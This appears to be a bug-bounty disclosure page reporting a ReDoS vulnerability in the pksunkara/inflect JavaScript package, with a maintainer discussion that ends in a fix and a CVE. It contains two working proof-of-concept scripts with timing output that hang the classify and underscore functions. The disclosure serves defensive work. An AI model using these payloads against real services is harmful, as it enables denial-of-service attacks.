Inefficient Regular Expression Complexity in pksunkara/inflect

Valid

Reported on

Sep 19th 2021


✍️ Description

The inflect package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted table_name as input to the classify function may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Put the below in a poc.js file and run with node

//poc.js
var inflect = require('i')();
for(var i = 1; i <= 500; i++) {
    var time = Date.now();
    var payload = ""+"\u0000".repeat(i*10000)+"\u0000"
    inflect.classify(payload)
    var time_cost = Date.now() - time;
    console.log("Classify time : " + payload.length + ": " + time_cost+" ms");
    }

Check the Output:

Classify time : 10001: 158 ms
Classify time : 20001: 565 ms
Classify time : 30001: 1282 ms
Classify time : 40001: 2129 ms
Classify time : 50001: 3369 ms
Classify time : 60001: 8430 ms
Classify time : 70001: 15926 ms
Classify time : 80001: 16221 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 years ago
ready-research submitted a
2 years ago
ready-research modified the report
2 years ago
Z-Old
2 years ago

Admin


Hey ready-research, I've emailed the maintainer for you.

We have contacted a member of the pksunkara/inflect team and are waiting to hear back 2 years ago
Pavan Kumar Sunkara validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pavan
2 years ago

Maintainer


I am not sure how to fix this. We use a lot of regexp in that package

ready-research
2 years ago

Researcher


@pavan Thank you for your confirmation. I have provided a patch. You can use that to patch this issue.

Pavan
2 years ago

Maintainer


What about the other regexes in that file?

ready-research
2 years ago

Researcher


I will test those for you and let you know.

Pavan
2 years ago

Maintainer


Thanks.

ready-research
2 years ago

Researcher


Hi @pavan, found another issue in underscore https://github.com/pksunkara/inflect/blob/22fa473b778e0f9fc4028f8592b521ba64aad94e/lib/methods.js#L64

// PoC.js
var inflect = require('i')();
for(var i = 1; i <= 500; i++) {
    var time = Date.now();
    var payload = ""+"A".repeat(i*10000)+" "
    inflect.underscore(payload)
    var time_cost = Date.now() - time;
    console.log("Underscore time : " + payload.length + ": " + time_cost+" ms");
    }

Check the Output:

Underscore time : 10001: 159 ms
Underscore time : 20001: 647 ms
Underscore time : 30001: 1361 ms
Underscore time : 40001: 2354 ms
Underscore time : 50001: 3938 ms
Underscore time : 60001: 5971 ms
--
--
ready-research
2 years ago

Researcher


All the other regexes are good.

ready-research submitted a
2 years ago
Pavan Kumar Sunkara marked this as fixed with commit a9a0a8 2 years ago
ready-research has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
2 years ago

Admin


CVE published! 🎊

to join this conversation